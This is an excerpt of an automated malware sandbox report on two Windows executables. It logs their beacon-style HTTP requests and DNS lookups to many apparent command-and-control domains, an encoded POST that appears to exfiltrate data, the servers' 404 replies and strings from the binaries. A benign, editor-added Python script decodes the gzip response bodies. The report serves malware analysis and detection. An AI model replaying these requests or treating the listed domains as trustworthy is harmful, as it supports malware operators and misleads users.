Source: global traffic; HTTP traffic detected: GET /3c39/?QdC=AFMh5N&gNl=YJ1cks1SYK0GZq42JMKosMxqD7l69+m/NeZhR8z8BBiDd+X2Cv9su+DXwFPagftVLlPhJQa55ON8fFKrMbD5xy4GuGg/d1ltQY/UvK/AgFb7LLw4oj1fG5g= HTTP/1.1 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8 | Accept-Language: en-US,en | Connection: close | Host: www.boutiqueinaboxshop.com | User-Agent: Mozilla/5.0 (Windows NT 6.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
Source: global traffic; HTTP traffic detected: GET /ji0a/?gNl=V3mCM9XQBGvfB9U06Ih+tXIqrPaKM7STaqz3Sg8J9fi/ICLIIWXTyIdm7sWw/CYltmRpxX2KmohWm3ESn2yFDi2EPP2Dl3Wtaq56t2waT9cNTaD0UhcN7pw=&QdC=AFMh5N HTTP/1.1 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8 | Accept-Language: en-US,en | Connection: close | Host: www.lmsforsme.com | User-Agent: Mozilla/5.0 (Windows NT 6.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
Source: global traffic; HTTP traffic detected: GET /sm5u/?QdC=AFMh5N&gNl=zNZoGmKn88rfb3KOdi+n0xDDAiSnmhNP+SjTw3nNTKqa02KirOkI5zxlnzd0nBaR3gkleMTrs3XUtciJN1tFuT7tPHWqtnmTkchQjLPuknfMv3nJFi7Ou4E= HTTP/1.1 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8 | Accept-Language: en-US,en | Connection: close | Host: www.fundraiserstuffies.com | User-Agent: Mozilla/5.0 (Windows NT 6.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
Source: global traffic; HTTP traffic detected: GET /etzb/?gNl=y1l9UKEI/lQ7TFqul8cFoyc9amTFojzHvoSS/tM0SGjjEe4pj9aFUBRbEUlPxRBYTwZ9epMSinUSWJlauv4T6Qd4dJfAkKACIvt4qodfW5IqShEDlLijX08=&QdC=AFMh5N HTTP/1.1 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8 | Accept-Language: en-US,en | Connection: close | Host: www.soutsour.xyz | User-Agent: Mozilla/5.0 (Windows NT 6.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
Source: global traffic; HTTP traffic detected: GET /0guv/?QdC=AFMh5N&gNl=koG+9f1JLs4iU3gpYtYeL1r94dP8/9FWskMDX1FP+QK1lg22bIT8kucy8PYjp4kPLlPGQE/9ELG4RRacCoDP+inEdxRGBXRQHVAT/D1/4SMcq2gI6by2YHg= HTTP/1.1 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8 | Accept-Language: en-US,en | Connection: close | Host: www.mysticriverpath.com | User-Agent: Mozilla/5.0 (Windows NT 6.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
Source: global traffic; HTTP traffic detected: GET /g9bf/?gNl=lSzW3nVeW6JfMGMA7uN/7lGGplX0heZbz7O+lPV3tkxu97wid/nYpvoiQET18CfdiTSEkQjNZYpiQysHYXobuoEXQaB6E6dp7KAEYXO0AOAuSkjWL8ZFyYk=&QdC=AFMh5N HTTP/1.1 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8 | Accept-Language: en-US,en | Connection: close | Host: www.mscuration.com | User-Agent: Mozilla/5.0 (Windows NT 6.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
Source: global traffic; HTTP traffic detected: GET /fykj/?QdC=AFMh5N&gNl=35knRvMfoS1B/FjQR0nniARQj9EspOWzm24eQtGg/GuRPegg+KNm598AA4o0kC2C9Cini7tZg+0o0500Ok9c7JziiiuD4vC4eWhlbFnGTmqZG0oUv+qZGLo= HTTP/1.1 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8 | Accept-Language: en-US,en | Connection: close | Host: www.wb515.com | User-Agent: Mozilla/5.0 (Windows NT 6.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
Source: global traffic; HTTP traffic detected: GET /w2w0/?gNl=0prXS1nuo7L4BRXFxH+6P5N8ZSQ81sbrd+caxMQkr8e3H5z/+yVS+HOiTMdRuolLjIsNRBtZ8MXFl+jKIOJJ6lQvMONrxVe4j9OmCVx+YV9WHy3pokjU6vI=&QdC=AFMh5N HTTP/1.1 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8 | Accept-Language: en-US,en | Connection: close | Host: www.hf7777hi.net | User-Agent: Mozilla/5.0 (Windows NT 6.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
Source: global traffic; HTTP traffic detected: GET /3rdj/?QdC=AFMh5N&gNl=jZBvy0udQ72nya4zXQbiXt45CoTcGWwSxfgakTq4JdzmmcUs/sbVPe6dK9wcjd2s4Il3pIOfxWomFNoQbEAT45u/xcgM8nK3ctQKu/SLrVpagLQNn/wFC6g= HTTP/1.1 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8 | Accept-Language: en-US,en | Connection: close | Host: www.qrdinamicos.com | User-Agent: Mozilla/5.0 (Windows NT 6.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
Source: global traffic; HTTP traffic detected: GET /blhi/?gNl=C8WIH5va3s5TreqFc2nELhDO18EwidTtZxXY9LPFT+Lx3xlqM8I5Ju57JxDvAC7mNl8Ctob5Agt863C6qDgbGQkS7yjDKhT2SlbiFn0xwTwlv8oMq0J/ecs=&QdC=AFMh5N HTTP/1.1 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8 | Accept-Language: en-US,en | Connection: close | Host: www.jleabres.com | User-Agent: Mozilla/5.0 (Windows NT 6.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
Source: global traffic; DNS traffic detected: DNS query: www.angrytee.com
Source: global traffic; DNS traffic detected: DNS query: www.orthonow.live
Source: global traffic; DNS traffic detected: DNS query: www.boutiqueinaboxshop.com
Source: global traffic; DNS traffic detected: DNS query: www.lmsforsme.com
Source: global traffic; DNS traffic detected: DNS query: www.fundraiserstuffies.com
Source: global traffic; DNS traffic detected: DNS query: www.soutsour.xyz
Source: global traffic; DNS traffic detected: DNS query: www.mysticriverpath.com
Source: global traffic; DNS traffic detected: DNS query: www.mscuration.com
Source: global traffic; DNS traffic detected: DNS query: www.wb515.com
Source: global traffic; DNS traffic detected: DNS query: www.hf7777hi.net
Source: global traffic; DNS traffic detected: DNS query: www.qrdinamicos.com
Source: global traffic; DNS traffic detected: DNS query: www.personal-stylist.club
Source: global traffic; DNS traffic detected: DNS query: www.jleabres.com
Source: global traffic; DNS traffic detected: DNS query: www.pu6wac.buzz
Source: unknown; HTTP traffic detected: POST /v6z4/ HTTP/1.1 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8 | Accept-Encoding: gzip, deflate | Accept-Language: en-US,en | Cache-Control: no-cache | Content-Type: application/x-www-form-urlencoded | Content-Length: 200 | Connection: close | Host: www.orthonow.live | Origin: http://www.orthonow.live | Referer: http://www.orthonow.live/v6z4/ | User-Agent: Mozilla/5.0 (Windows NT 6.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36 | Data Raw: 67 4e 6c 3d 69 37 6d 46 77 69 4b 52 4d 48 42 4f 6c 54 38 49 77 36 58 46 54 49 4c 7a 50 38 36 4d 46 36 61 4b 76 73 76 4f 6a 2f 68 54 67 38 72 68 69 52 56 34 38 67 57 5a 32 4d 6e 6e 6c 30 45 73 76 57 50 61 69 72 5a 30 4c 75 70 47 75 36 48 31 38 57 56 58 74 6b 65 78 46 68 72 31 52 6d 63 42 4b 55 4e 64 5a 57 38 47 6e 79 42 62 43 53 4e 4a 74 58 58 4f 30 6a 39 61 55 47 7a 51 42 70 64 68 7a 49 50 53 6c 53 68 73 2f 39 30 73 46 78 49 6e 6e 51 32 4b 43 72 65 78 4c 47 37 42 75 4f 2f 51 31 2b 69 6c 76 33 33 69 4d 32 48 58 4d 71 64 50 6a 62 58 42 62 2b 51 78 47 59 2b 69 50 6c 6a 44 65 68 38 6c 51 67 3d 3d | Data Ascii: gNl=i7mFwiKRMHBOlT8Iw6XFTILzP86MF6aKvsvOj/hTg8rhiRV48gWZ2Mnnl0EsvWPairZ0LupGu6H18WVXtkexFhr1RmcBKUNdZW8GnyBbCSNJtXXO0j9aUGzQBpdhzIPSlShs/90sFxInnQ2KCrexLG7BuO/Q1+ilv33iM2HXMqdPjbXBb+QxGY+iPljDeh8lQg==
            Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Date: Mon, 08 Jul 2024 07:34:45 GMT | Server: Apache | Content-Length: 389 | Connection: close | Content-Type: text/html | Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
            Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Date: Mon, 08 Jul 2024 07:34:47 GMT | Server: Apache | Content-Length: 389 | Connection: close | Content-Type: text/html | Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
            Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Date: Mon, 08 Jul 2024 07:34:50 GMT | Server: Apache | Content-Length: 389 | Connection: close | Content-Type: text/html | Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
            Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Date: Mon, 08 Jul 2024 07:35:08 GMT | Server: Apache | Content-Length: 389 | Connection: close | Content-Type: text/html; charset=utf-8 | Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
            Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Date: Mon, 08 Jul 2024 07:35:14 GMT | Server: Apache | Content-Length: 315 | Connection: close | Content-Type: text/html; charset=iso-8859-1 | Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
            Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Date: Mon, 08 Jul 2024 07:35:16 GMT | Server: Apache | Content-Length: 315 | Connection: close | Content-Type: text/html; charset=iso-8859-1 | Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
            Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Date: Mon, 08 Jul 2024 07:35:19 GMT | Server: Apache | Content-Length: 315 | Connection: close | Content-Type: text/html; charset=iso-8859-1 | Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
            Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Date: Mon, 08 Jul 2024 07:35:21 GMT | Server: Apache | Content-Length: 315 | Connection: close | Content-Type: text/html; charset=iso-8859-1 | Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
            Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx | Date: Mon, 08 Jul 2024 07:35:41 GMT | Content-Type: text/html | Content-Length: 548 | Connection: close | Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
            Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx | Date: Mon, 08 Jul 2024 07:35:44 GMT | Content-Type: text/html | Content-Length: 548 | Connection: close | Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
            Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx | Date: Mon, 08 Jul 2024 07:35:46 GMT | Content-Type: text/html | Content-Length: 548 | Connection: close | Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
            Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx | Date: Mon, 08 Jul 2024 07:35:49 GMT | Content-Type: text/html | Content-Length: 548 | Connection: close | Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
            Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Content-Type: text/html | Transfer-Encoding: chunked | Connection: close | Date: Mon, 08 Jul 2024 07:36:30 GMT | Server: Apache | Content-Encoding: gzip
            Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Content-Type: text/html | Transfer-Encoding: chunked | Connection: close | Date: Mon, 08 Jul 2024 07:36:32 GMT | Server: Apache | Content-Encoding: gzip
            Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Content-Type: text/html | Transfer-Encoding: chunked | Connection: close | Date: Mon, 08 Jul 2024 07:36:35 GMT | Server: Apache | Content-Encoding: gzip
            Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Content-Type: text/html | Content-Length: 596 | Connection: close | Date: Mon, 08 Jul 2024 07:36:37 GMT | Server: Apache | Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN""http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Error 404! </title> <meta content="text/html; charset=utf-8" http-equiv="Content-Type"> <meta content="no-cache" http-equiv="cache-control"> </head> <body style="font-family:arial;"> <h1 style="color:#0a328c;font-size:1.0em;"> ERROR 404: ARCHIVO NO ENCONTRADO </h1> <p style="font-size:0.8em;"> El documento solicitado no ha sido encontrado. </p> </body></html>
            Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx | Date: Mon, 08 Jul 2024 07:36:51 GMT | Content-Type: text/html; charset=iso-8859-1 | Transfer-Encoding: chunked | Connection: close | x-backend: web2 | X-Frontend: frontend1 | X-Trace-Id: ti_ace6c878ffe446dba7a57a3ca9ee6246 | Content-Encoding: gzip
            Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx | Date: Mon, 08 Jul 2024 07:36:54 GMT | Content-Type: text/html; charset=iso-8859-1 | Transfer-Encoding: chunked | Connection: close | x-backend: web2 | X-Frontend: frontend1 | X-Trace-Id: ti_a6efb1f31221a247a14ca3c0e8b38e20 | Content-Encoding: gzip
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 08 Jul 2024 07:36:56 GMTContent-Type: text/html; charset=iso-8859-1Transfer-Encoding: chunkedConnection: closex-backend: web2X-Frontend: frontend1X-Trace-Id: ti_f36ea58d1e3d6efb07d1ea9618fb2aa1Content-Encoding: gzipData Raw: 31 35 66 0d 0a 1f 8b 08 00 00 00 00 00 04 03 75 52 b1 4e c3 30 10 dd fb 15 47 16 16 c8 b5 08 24 84 d2 2c c0 c0 02 1d 90 10 e3 d5 b9 d4 56 1d 3b b2 2f 0d f9 7b ec a4 5d 90 f0 62 dd f9 de bb f7 9e 5c 5d bd 7c 3c 7f 7e ef 5e 41 4b 67 eb 55 75 b9 98 9a 54 89 11 cb f5 bb 87 9e 0e 0c ad 1f 5c 53 e1 d2 5c 55 d6 b8 23 04 b6 db 22 ca 64 39 6a 66 29 40 a6 9e b7 85 f0 8f a0 8a b1 00 1d b8 dd 16 5a a4 8f 4f 88 e3 38 96 2d 45 e9 c8 d8 21 72 50 de 09 3b 29 95 ef b0 35 89 44 7c 48 ab 32 14 d3 8c 2b 67 0e 4c 52 50 2f 92 f6 be 99 52 49 e0 a8 4b 8b 3e 7d 5f d4 15 52 96 be f9 ab 34 75 56 55 5f 7f 31 28 3f d8 c6 5d 0b b4 c6 35 40 17 3f 01 44 33 cc 46 26 3f c0 c9 44 23 dc 94 b0 b3 4c 31 a1 34 ab 63 1a 21 81 fc ac e9 c4 33 40 f9 10 58 c9 02 a4 44 28 61 02 3a 64 bd 15 f6 f3 ce b7 76 86 50 58 10 7e 74 1c c0 b7 09 6e 22 34 3e 7b bb 99 27 14 39 88 2c 43 7f 51 a5 39 61 f6 13 24 8b ff 67 57 6a b6 3d 6a 85 ec 6e 87 88 14 c4 a8 94 1e 6e 1e d6 f9 dc 3d ae 37 f7 9b a2 56 81 49 8c 3b 9c b9 71 e4 7d 76 08 c6 e5 dd 01 48 a5 60 9c e4 fc ce ca f1 9c 2f 2e 1f e1 17 03 33 d4 70 20 02 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 15fuRN0G$,V;/{]b\]|<~^AKgUuT\S\U#"d9jf)@ZO8-E!rP;)5D|H2+gLRP/RIK>}_R4uVU_1(?]5@?D3F&?D#L14c!3@XD(a:dvPX~tn"4>{'9,CQ9a$gWj=jnn=7VI;q}vH`/.3p 0
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 08 Jul 2024 07:36:59 GMTContent-Type: text/html; charset=iso-8859-1Content-Length: 544Connection: closex-backend: web2X-Frontend: frontend1X-Trace-Id: ti_13f27a3d4ba3fee707956bee565fe02dData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 4e 6f 20 70 61 67 65 20 66 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 66 61 73 74 6d 61 69 6c 75 73 65 72 63 6f 6e 74 65 6e 74 2e 63 6f 6d 2f 66 69 6c 65 73 74 6f 72 61 67 65 2f 63 73 73 2f 6d 61 69 6e 2e 63 73 73 22 20 2f 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 61 20 6e 61 6d 65 3d 22 54 6f 70 22 3e 3c 2f 61 3e 0a 3c 68 31 3e 4e 6f 20 70 61 67 65 20 66 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 57 65 20 63 6f 75 6c 64 6e 27 74 20 66 69 6e 64 20 61 20 70 61 67 65 20 66 6f 72 20 74 68 65 20 6c 69 6e 6b 20 79 6f 75 20 76 69 73 69 74 65 64 2e 20 50 6c 65 61 73 65 20 63 68 65 63 6b 20 74 68 61 74 20 79 6f 75 20 68 61 76 65 20 74 68 65 20 63 6f 72 72 65 63 74 20 6c 69 6e 6b 20 61 6e 64 20 74 72 79 20 61 67 61 69 6e 2e 3c 2f 70 3e 0a 3c 70 3e 49 66 20 79 6f 75 20 61 72 65 20 74 68 65 20 6f 77 6e 65 72 20 6f 66 20 74 68 69 73 20 64 6f 6d 61 69 6e 2c 20 79 6f 75 20 63 61 6e 20 73 65 74 75 70 20 61 20 70 61 67 65 20 68 65 72 65 20 62 79 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 66 61 73 74 6d 61 69 6c 2e 68 65 6c 70 2f 68 63 2f 65 6e 2d 75 73 2f 61 72 74 69 63 6c 65 73 2f 31 35 30 30 30 30 30 32 38 30 31 34 31 22 3e 63 72 65 61 74 69 6e 67 20 61 20 70 61 67 65 2f 77 65 62 73 69 74 65 20 69 6e 20 79 6f 75 72 20 61 63 63 6f 75 6e 74 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html><head><title>No page found</title><link rel="stylesheet" type="text/css" href="https://www.fastmailusercontent.com/filestorage/css/main.css" /></head><body><a name="Top"></a><h1>No page found</h1><p>We couldn't find a page for the link you visited. Please check that you have the correct link and try again.</p><p>If you are the owner of this domain, you can setup a page here by <a href="https://www.fastmail.help/hc/en-us/articles/1500000280141">creating a page/website in your account</a>.</p></body></html>
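The three gzip-encoded 404 rows above cannot be read from their "Data Ascii" column; the body has to be recovered from the "Data Raw" hex. The script below is an added example by the editor, not part of the Joe Sandbox report: it parses a Data Raw dump, strips the HTTP/1.1 chunked framing and gunzips the payload, with strict framing checks so that a truncated capture or a mangled hex pair fails loudly instead of yielding garbage. It embeds the hex of the first 404 row (07:36:51). The `build_sample_hex` helper and its `<html>` payload are constructed test input, not report data. Reading the gzip trailer of the embedded row gives ISIZE = 544, the same size as the Content-Length of the uncompressed 404 at 07:36:59, which is consistent with all four responses being the same Fastmail "No page found" placeholder.

```python
import gzip
import re
import struct
import zlib

# Hex pairs copied from the "Data Raw" column of the first 404 row above
# (the 07:36:51 response): chunk-size line "15f\r\n", 351 bytes of gzip
# data, then the terminating "0\r\n\r\n".
PAGE_DATA_RAW = (
    "31 35 66 0d 0a "
    "1f 8b 08 00 00 00 00 00 04 03 75 52 b1 4e c3 30 10 dd fb 15 47 16 16 c8 b5 08 24 84 d2 2c "
    "c0 c0 02 1d 90 10 e3 d5 b9 d4 56 1d 3b b2 2f 0d f9 7b ec a4 5d 90 f0 62 dd f9 de bb f7 9e "
    "5c 5d bd 7c 3c 7f 7e ef 5e 41 4b 67 eb 55 75 b9 98 9a 54 89 11 cb f5 bb 87 9e 0e 0c ad 1f "
    "5c 53 e1 d2 5c 55 d6 b8 23 04 b6 db 22 ca 64 39 6a 66 29 40 a6 9e b7 85 f0 8f a0 8a b1 00 "
    "1d b8 dd 16 5a a4 8f 4f 88 e3 38 96 2d 45 e9 c8 d8 21 72 50 de 09 3b 29 95 ef b0 35 89 44 "
    "7c 48 ab 32 14 d3 8c 2b 67 0e 4c 52 50 2f 92 f6 be 99 52 49 e0 a8 4b 8b 3e 7d 5f d4 15 52 "
    "96 be f9 ab 34 75 56 55 5f 7f 31 28 3f d8 c6 5d 0b b4 c6 35 40 17 3f 01 44 33 cc 46 26 3f "
    "c0 c9 44 23 dc 94 b0 b3 4c 31 a1 34 ab 63 1a 21 81 fc ac e9 c4 33 40 f9 10 58 c9 02 a4 44 "
    "28 61 02 3a 64 bd 15 f6 f3 ce b7 76 86 50 58 10 7e 74 1c c0 b7 09 6e 22 34 3e 7b bb 99 27 "
    "14 39 88 2c 43 7f 51 a5 39 61 f6 13 24 8b ff 67 57 6a b6 3d 6a 85 ec 6e 87 88 14 c4 a8 94 "
    "1e 6e 1e d6 f9 dc 3d ae 37 f7 9b a2 56 81 49 8c 3b 9c b9 71 e4 7d 76 08 c6 e5 dd 01 48 a5 "
    "60 9c e4 fc ce ca f1 9c 2f 2e 1f e1 17 03 33 d4 70 20 02 00 00 "
    "0d 0a 30 0d 0a 0d 0a"
)


def extract_data_raw(row):
    """Return the hex text between 'Data Raw:' and 'Data Ascii:' of a full report row."""
    start = row.index("Data Raw:") + len("Data Raw:")
    end = row.find("Data Ascii:", start)
    return row[start:end] if end >= 0 else row[start:]


def hexdump_to_bytes(text):
    """Bytes of a report hex dump; accepts a whole row or just its 'Data Raw' part."""
    if "Data Raw:" in text:
        text = extract_data_raw(text)
    return bytes.fromhex(re.sub(r"[^0-9a-fA-F]", "", text))


def dechunk(body):
    """Decode an HTTP/1.1 chunked transfer-encoded body (RFC 9112, section 7.1).

    Raises ValueError when the framing is inconsistent, which is the signal that
    the capture is truncated or a hex pair was mangled on its way into the report.
    """
    out = bytearray()
    pos = 0
    while True:
        eol = body.find(b"\r\n", pos)
        if eol < 0:
            raise ValueError("missing chunk-size line")
        size = int(body[pos:eol].split(b";", 1)[0].strip(), 16)  # drop chunk extensions
        pos = eol + 2
        if size == 0:
            return bytes(out)  # last-chunk; any trailer fields are ignored
        chunk = body[pos:pos + size]
        if len(chunk) != size:
            raise ValueError(f"chunk truncated: want {size} bytes, have {len(chunk)}")
        out += chunk
        pos += size
        if body[pos:pos + 2] != b"\r\n":
            raise ValueError("chunk data not terminated by CRLF")
        pos += 2


def gzip_trailer(gz):
    """(crc32, isize) from the last 8 bytes of a gzip member; isize is the uncompressed length."""
    if gz[:2] != b"\x1f\x8b":
        raise ValueError("not a gzip member")
    return struct.unpack("<II", gz[-8:])


def decode_response_body(data_raw):
    """Hex dump of a chunked + gzip HTTP body -> decompressed bytes."""
    return gzip.decompress(dechunk(hexdump_to_bytes(data_raw)))


def build_sample_hex(plain):
    """Constructed test input: wrap plain bytes as chunked gzip in the report's hex format."""
    gz = gzip.compress(plain, mtime=0)
    framed = b"%x\r\n" % len(gz) + gz + b"\r\n0\r\n\r\n"
    return " ".join(f"{b:02x}" for b in framed)


if __name__ == "__main__":
    gz = dechunk(hexdump_to_bytes(PAGE_DATA_RAW))
    crc, isize = gzip_trailer(gz)
    print(f"chunk payload {len(gz)} bytes, gzip ISIZE={isize}, CRC32=0x{crc:08x}")
    try:
        print(gzip.decompress(gz).decode("iso-8859-1"))
    except (OSError, zlib.error, EOFError) as exc:
        print("decompression failed (hex mangled or capture truncated):", exc)
```

The same functions work on the other two gzip rows (07:36:54 and 07:36:56), which carry byte-identical hex, and on the uncompressed 07:36:59 row by skipping `dechunk` and `gzip.decompress`.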
            Source: jlsvOH1c8bSRKqM.exe, AZJifQrhDpEQCA.exe.0.drString found in binary or memory: http://blog.ytmc.fun
            Source: jlsvOH1c8bSRKqM.exe, 00000000.00000002.1697745017.0000000002778000.00000004.00000800.00020000.00000000.sdmp, AZJifQrhDpEQCA.exe, 00000009.00000002.1799689113.0000000002841000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
            Source: jlsvOH1c8bSRKqM.exe, 00000000.00000002.1719993933.0000000006832000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
            Source: jlsvOH1c8bSRKqM.exe, 00000000.00000002.1719993933.0000000006832000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.carterandcone.coml
            Source: jlsvOH1c8bSRKqM.exe, 00000000.00000002.1719993933.0000000006832000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com
